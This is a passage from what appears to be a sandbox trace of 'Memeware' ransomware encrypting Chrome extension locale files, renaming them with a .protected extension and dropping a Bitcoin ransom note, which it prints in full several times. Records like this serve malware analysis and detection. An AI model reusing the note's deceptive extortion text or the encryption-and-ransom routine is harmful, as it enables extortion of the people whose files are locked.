(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.504] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0081.504] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.504] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0081.504] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.504] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0081.504] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.504] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0081.505] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.505] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.505] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.505] CloseHandle (hObject=0x168) returned 1 [0081.505] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json.protected") returned 168 [0081.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0081.505] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.505] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.505] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 162 [0081.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.506] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.506] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.506] lstrlenA (lpString="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") returned 684 [0081.506] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, 
lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.507] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.507] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.507] CloseHandle (hObject=0x164) returned 1 [0081.507] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.507] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0081.507] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0081.507] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0081.507] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0081.507] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0081.507] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT") returned 144 [0081.507] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0081.507] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0081.507] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\*") returned 146 [0081.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.507] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.507] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.507] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.507] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.507] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.507] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\.") returned 146 [0081.507] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.507] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.507] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.507] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.507] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.507] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.507] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.507] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\..") returned 147 [0081.507] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.507] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.507] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.507] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned 
-1 [0081.507] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.508] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.508] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.508] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.508] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0081.508] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.508] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.508] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.508] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.508] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0081.508] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 
[0081.508] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0081.508] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.508] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0081.508] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.508] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdf, lpOverlapped=0x0) returned 1 [0081.509] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.509] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdf, lpOverlapped=0x0) returned 1 [0081.509] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.509] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.509] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.509] CloseHandle (hObject=0x168) returned 1 [0081.509] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json.protected") returned 168 [0081.509] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0081.510] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.510] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.510] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 162 [0081.510] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.510] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.510] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.511] lstrlenA (lpString="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") returned 684 [0081.511] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.511] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.511] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.511] CloseHandle (hObject=0x164) returned 1 [0081.511] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.511] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0081.511] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0081.512] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0081.512] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0081.512] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0081.512] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro") returned 141 [0081.512] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0081.512] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0081.512] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\*") returned 143 [0081.512] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.512] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.512] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.512] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.512] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.512] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.512] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\.") returned 143 [0081.512] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.512] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.512] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.512] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.512] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.512] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.512] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.512] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\..") returned 144 [0081.512] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.512] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.512] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.512] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0081.512] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.512] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.512] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.512] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.512] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json") returned 155 [0081.512] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.512] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.512] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.513] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.513] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.513] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json") returned 155 [0081.513] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.513] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json") returned 155 [0081.513] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.513] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json") returned 155 [0081.513] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.513] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x109, lpOverlapped=0x0) returned 1 [0081.514] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.514] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x109, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x109, lpOverlapped=0x0) returned 1 [0081.514] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.514] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.514] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.514] CloseHandle (hObject=0x168) returned 1 [0081.514] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
